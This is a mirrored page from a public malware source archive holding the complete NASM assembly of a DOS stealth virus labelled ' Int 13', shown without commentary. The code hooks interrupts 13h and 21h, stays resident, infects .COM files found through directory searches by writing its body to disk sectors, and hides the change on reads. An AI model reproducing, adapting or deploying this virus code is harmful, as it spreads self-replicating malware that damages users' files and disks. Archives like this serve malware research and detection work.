mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
310 lines
4.2 KiB
NASM
310 lines
4.2 KiB
NASM
|
Code Segment
|
||
|
Assume CS:Code
|
||
|
|
||
|
Old13 = 9Ch
|
||
|
True13 = 9Dh
|
||
|
Saved21 = 9Eh
|
||
|
Temp13 = 9Fh
|
||
|
|
||
|
VStart: loop Next ; Virus ID
|
||
|
Next: push ax
|
||
|
mov di,13h * 4
|
||
|
push di
|
||
|
xor bp,bp
|
||
|
mov ds,bp
|
||
|
les bx,[di]
|
||
|
mov di,True13 * 4
|
||
|
mov [di-4],bx
|
||
|
mov [di-2],es
|
||
|
mov ah,13h
|
||
|
int 2Fh
|
||
|
push es
|
||
|
push bx
|
||
|
int 2Fh
|
||
|
mov es,bp
|
||
|
mov si,21h * 4
|
||
|
pop ax
|
||
|
stosw
|
||
|
pop ax
|
||
|
stosw
|
||
|
push si
|
||
|
movsw
|
||
|
movsw
|
||
|
mov ah,52h
|
||
|
int 21h
|
||
|
push es
|
||
|
pop ds
|
||
|
les ax,[bx+12h] ; ax is now 0000h, i.e. ah is 0.
|
||
|
push word ptr es:[bp+2]
|
||
|
mov si,100h
|
||
|
mov cx,si
|
||
|
mov di,bp
|
||
|
push si
|
||
|
rep movs word ptr es:[di], cs:[si]
|
||
|
pop si
|
||
|
pop word ptr ds:[bx+14h]
|
||
|
push es
|
||
|
mov al, offset Continue ; Let's use it!
|
||
|
push ax
|
||
|
retf
|
||
|
|
||
|
SavedCX dw 1
|
||
|
SavedDX dw 0
|
||
|
SavedBX dw 0
|
||
|
SavedES dw 0
|
||
|
|
||
|
FileWord dw 0
|
||
|
|
||
|
SCX = offset SavedCX - offset VStart
|
||
|
SDX = offset SavedDX - offset VStart
|
||
|
|
||
|
Continue: mov es,bp
|
||
|
pop di
|
||
|
mov al,offset Int21 ; Two times!
|
||
|
stosw
|
||
|
mov es:[di],cs
|
||
|
pop di
|
||
|
mov al,offset Int13 ; Three times!
|
||
|
stosw
|
||
|
mov es:[di],cs
|
||
|
|
||
|
mov es,[bp+2Ch] ; This assumes SS:
|
||
|
mov di,bp
|
||
|
xchg ax,bp
|
||
|
dec cx
|
||
|
ScanEnv: repne scasb
|
||
|
scasb
|
||
|
jnz ScanEnv
|
||
|
scasw
|
||
|
push es
|
||
|
pop ds
|
||
|
mov dx,di
|
||
|
mov ah,3Dh
|
||
|
int 21h
|
||
|
jc NoStart
|
||
|
mov dx,si
|
||
|
xchg ax,bx
|
||
|
mov ah,3Fh
|
||
|
push ss
|
||
|
pop ds
|
||
|
int 21h
|
||
|
mov ah,3Eh
|
||
|
int 21h
|
||
|
|
||
|
pop ax
|
||
|
push ss
|
||
|
push si
|
||
|
push ss
|
||
|
pop es
|
||
|
retf
|
||
|
|
||
|
NoStart: mov ah,4Ch
|
||
|
int 21h
|
||
|
|
||
|
Int13V: mov SavedBX,bx
|
||
|
mov SavedCX,cx
|
||
|
mov SavedDX,dx
|
||
|
mov SavedES,es
|
||
|
|
||
|
Go13: int Old13
|
||
|
jmp short RetF2
|
||
|
|
||
|
Int13: cmp ah,2
|
||
|
jne Go13
|
||
|
push ds
|
||
|
push si
|
||
|
push di
|
||
|
push cx
|
||
|
push dx
|
||
|
push es
|
||
|
push bx
|
||
|
push dx
|
||
|
int Old13
|
||
|
pop dx
|
||
|
jc Exit13
|
||
|
cmp word ptr es:[bx],00E2h
|
||
|
clc
|
||
|
jne Exit13
|
||
|
mov ax,202h
|
||
|
mov cx,es:[bx+SCX]
|
||
|
mov dh,byte ptr es:[bx+SDX+1]
|
||
|
mov bx,0B800h
|
||
|
mov ds,bx
|
||
|
mov es,bx
|
||
|
mov bh,78h
|
||
|
int True13
|
||
|
jc Exit13
|
||
|
mov si,7A00h
|
||
|
pop bx
|
||
|
mov di,bx
|
||
|
pop es
|
||
|
mov cx,100h
|
||
|
rep movsw
|
||
|
jmp short Exit13_1
|
||
|
Exit13: pop bx
|
||
|
pop es
|
||
|
Exit13_1: pop dx
|
||
|
pop cx
|
||
|
pop di
|
||
|
pop si
|
||
|
pop ds
|
||
|
RetF2: retf 2
|
||
|
|
||
|
Int21: cmp ah,12h
|
||
|
je FindNext
|
||
|
int Saved21
|
||
|
jmp RetF2
|
||
|
FindNext: int Saved21
|
||
|
cmp al,0
|
||
|
jnz RetF2
|
||
|
push ax
|
||
|
push bx
|
||
|
push ds
|
||
|
push es
|
||
|
mov ah,2Fh
|
||
|
int Saved21
|
||
|
push es
|
||
|
pop ds
|
||
|
mov ax,'MO'
|
||
|
cmp ax,[bx+17]
|
||
|
jne Exit1
|
||
|
cmp ax,[bx+9]
|
||
|
je Exit1
|
||
|
mov al,[bx+7]
|
||
|
add al,'@'
|
||
|
push cx
|
||
|
push dx
|
||
|
mov cx,[bx+36]
|
||
|
mov dx,200h
|
||
|
cmp cx,dx
|
||
|
jb Exit2
|
||
|
dec cx
|
||
|
test ch,10b
|
||
|
jz Infect
|
||
|
cmp al,'C'
|
||
|
jb Exit2
|
||
|
test ch,100b
|
||
|
jz Infect
|
||
|
Exit2: pop dx
|
||
|
pop cx
|
||
|
Exit1: pop es
|
||
|
pop ds
|
||
|
pop bx
|
||
|
pop ax
|
||
|
jmp RetF2
|
||
|
|
||
|
Infect: push si
|
||
|
push di
|
||
|
push cs
|
||
|
pop es
|
||
|
mov di,dx
|
||
|
lea si,[bx+8]
|
||
|
mov ah,':'
|
||
|
stosw
|
||
|
movsw
|
||
|
movsw
|
||
|
movsw
|
||
|
movsw
|
||
|
mov al,'.'
|
||
|
stosb
|
||
|
movsw
|
||
|
movsb
|
||
|
xor ax,ax
|
||
|
stosb
|
||
|
|
||
|
mov ds,ax
|
||
|
mov es,ax
|
||
|
mov si,13h * 4
|
||
|
mov di,Temp13 * 4
|
||
|
|
||
|
push si
|
||
|
push di
|
||
|
push es
|
||
|
|
||
|
movsw
|
||
|
movsw
|
||
|
|
||
|
mov word ptr [si-4], offset Int13V
|
||
|
mov [si-2], cs
|
||
|
|
||
|
push cs
|
||
|
pop ds
|
||
|
|
||
|
mov ah,3Dh
|
||
|
int Saved21
|
||
|
xchg ax,bx
|
||
|
mov ax,4202h
|
||
|
mov cx,-1
|
||
|
mov dx,cx
|
||
|
int Saved21 ; DX must now be zero (.COM)
|
||
|
Go: mov ah,3Fh
|
||
|
mov dl,offset FileWord
|
||
|
mov di,dx
|
||
|
neg cx ; mov cx,1
|
||
|
int Saved21
|
||
|
push [di-8]
|
||
|
push [di-6]
|
||
|
mov ax,4200h
|
||
|
xor cx,cx ; can it be inc cx ??
|
||
|
xor dx,dx
|
||
|
int Saved21
|
||
|
mov ah,3Fh
|
||
|
mov dx,di
|
||
|
mov cl,2
|
||
|
int Saved21
|
||
|
mov ax,[di]
|
||
|
pop dx
|
||
|
pop cx
|
||
|
cmp ax,00E2h
|
||
|
je Close
|
||
|
cmp ax,5A4Dh
|
||
|
je Close
|
||
|
mov ax,202h
|
||
|
push cx
|
||
|
push dx
|
||
|
mov bx,0B800h
|
||
|
mov es,bx
|
||
|
mov bh,78h
|
||
|
int True13
|
||
|
lds si,[di-4]
|
||
|
push di
|
||
|
mov di,7A00h
|
||
|
mov cx,100h
|
||
|
rep movsw
|
||
|
pop di
|
||
|
mov ax,302h
|
||
|
pop dx
|
||
|
pop cx
|
||
|
push cx
|
||
|
push dx
|
||
|
int True13
|
||
|
pop dx
|
||
|
pop cx
|
||
|
mov ax,301h
|
||
|
xchg cx,cs:[di-8]
|
||
|
xchg dx,cs:[di-6]
|
||
|
push cs
|
||
|
pop es
|
||
|
xor bx,bx
|
||
|
int True13
|
||
|
Close: mov ah,3Eh
|
||
|
int Saved21
|
||
|
|
||
|
pop es
|
||
|
pop si
|
||
|
pop di
|
||
|
|
||
|
movs word ptr es:[di], es:[si]
|
||
|
movs word ptr es:[di], es:[si]
|
||
|
|
||
|
pop di
|
||
|
pop si
|
||
|
jmp Exit2
|
||
|
|
||
|
VName db ' Int 13'
|
||
|
|
||
|
VEnd label byte
|
||
|
VLen = offset VEnd - offset VStart
|
||
|
|
||
|
Code EndS
|
||
|
End VStart
|